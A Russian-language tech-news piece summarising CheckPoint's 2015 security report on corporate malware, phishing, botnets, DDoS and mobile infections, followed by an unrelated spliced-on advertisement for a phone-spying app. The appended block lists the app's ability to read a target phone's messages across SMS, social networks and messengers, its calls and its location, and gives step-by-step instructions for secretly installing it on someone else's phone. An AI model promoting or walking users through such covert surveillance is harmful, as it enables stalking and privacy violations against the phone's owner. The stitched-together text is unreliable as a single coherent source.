CheckPoint: Случаи корпоративной утечки данных участились

62d96cbb0cf5febdc52f9789c22b530cАналитическая компания CheckPoint занимается изучением информации, связанной с вредоносным программным обеспечением, получая детальную статистику взлома корпоративных систем. Новый отчёт имеет сравнительную графу, которая позволяет проанализировать изменения с 2013 года.

Отчёт под названием «2015 Security Report» был опубликован в официальном блоге компании. Статистика показывает, что количество случаев заражения совершенно неизвестными вирусами (по сравнению с 2013 годом) увеличилось на 25%. Под «неизвестными» подразумеваются программные продукты, на которые не умеют реагировать антивирусы. Поскольку вирусные базы всегда обновляются с определённым запаздыванием, а разработка «противоядия» занимает какое-то время, система может оставаться беззащитной для таких программ. Порой скорость проникновения вирусов составляла 106 в час!

Более половины всех вредоносов (52% от общего количества) распространялось посредством PDF-файлов. Их структура зачастую не вызывает подозрений у пользователей. Если же обратить внимание на поступавшие неизвестные угрозы, то их спектр весьма широк. Как сообщает CheckPoint, 86% исследуемых организаций обращались к фишинговым и заражённым сайтам. Из них 63% пытались произвести загрузку на компьютер файлов с вредоносным кодом, а в 83% злоумышленники использовали ботнеты. Они производили заражение всей сети сразу, поскольку обладали солидными вычислительными мощностями. Соединение с C&C сервером хакера производилось каждую минуту.

Существенно возросло количество DDoS-атак. Связано это с уменьшением стоимости аппаратного обеспечения. Теперь себестоимость атаки заметно ниже, чем несколько лет назад. Этим и пользуются хакеры, собирая массивные сетевые комплексы с колоссальным вычислительным потенциалом. Хакеры используют и классические DoS-атаки. Некоторые связаны с и переполнением буфера. В 2014 году более 90% всех компаний стали использовать портативные и переносные устройства для хранения данных. В их список входят мобильные телефоны, планшеты, ноутбуки. В 41% организаций применение такой техники уставом никак не регламентируется. Зачастую девайся не имеют даже элементарной защиты!

Самой слабой OS остаётся Google Android, поскольку обновиться до версии 5.1 может не каждый мобильный телефон. За прошлый год было заражено порядка 500 тысяч устройств на базе Android, а также 400 телефонов и планшетов на iOS. И это лишь в корпоративном сегменте рынка! Эксперты по безопасности обнаружили более 20 троянских программ, которые относятся к разным семействам и принадлежат разным авторам. У 96% компаний работники запускали потенциально опасные приложения. Многие пользовались и анонимайзерами. Они позволяли осуществлять скрытный серфинг в Сети. В 92% организаций присутствовал инструмент для удалённого доступа и администрирования баз данных.

За три года количество утечек важных данных возросло на 71%! Зачастую виноваты сами сотрудники, которые ведутся на элементарную социальную инженерию. Сказывается и недостаточно кропотливая работа отделов по безопасности. Инструктаж работников проводится редко. В CheckPoint считают, что показатели вирусной активности на корпоративном уровне будут расти и дальше. Хранить данные внутри компании, а также работать с ними удалённо, становится всё опаснее.

Возможности приложения: чтение переписки SMS, MMS, Вконтакте (официальное приложение и Kate Mobile), Одноклассники, Facebook, Мой Мир@mail.ru, ВСети.by, Twitter, Hangouts, Google+, WhatsApp, Skype, Viber, Hangouts (бывший Google Talk), Агент@mail.ru, ICQ, IM+ и IM+Pro, AIM, Jabber, MSN, MySpace, Yahoo! и Я.Онлайн (Яндекс Чат), Email переписку Gmail и Почта@mail.ru, просматривать посещенные сайты в браузерах Chrome, Opera, Firefox. Получить доступ к списку звонков и местонахождению телефона. Это малая часть всех возможностей. Весь список возможностей доступен тут

Видео руководство по установке для любого телефона:

Видео руководство по установке на телефон с ROOT правами:

Инструкция по установке и настройке:

  1. Заводим личный кабинет по этой ссылке: «Завести личный кабинет» (просто регистрируемся там).
  2. Заходим по этой ссылке: «Войти в личный кабинет на сайте» и вводим Email и пароль, которые указали пре регистрации.
  3. Жмем кнопку: «Добавить телефон»
  4. Заполняем все поля которые просят ввести. Заполняем правильно как там написано, иначе не будет работать.
  5. Жмем кнопку «Сохранить».
  6. Читаем инструкцию которая появилась после нажатия кнопки «Сохранить»
  7. Устанавливаем на телефон, (тот с которого нужно получить информацию) приложение, и настраиваем его согласно инструкции, которую вы должны будете прочитать на шаге 6.
  8. Приложение установлено. Все хорошо. Разработчики пишут, что надо подождать не менее часа, чтоб данные начали поступать в ваш личный кабинет который вы завели на шаге 1. В нашем случае данные пришли через 4 часа. Задуманное удалось! Желаю успехов.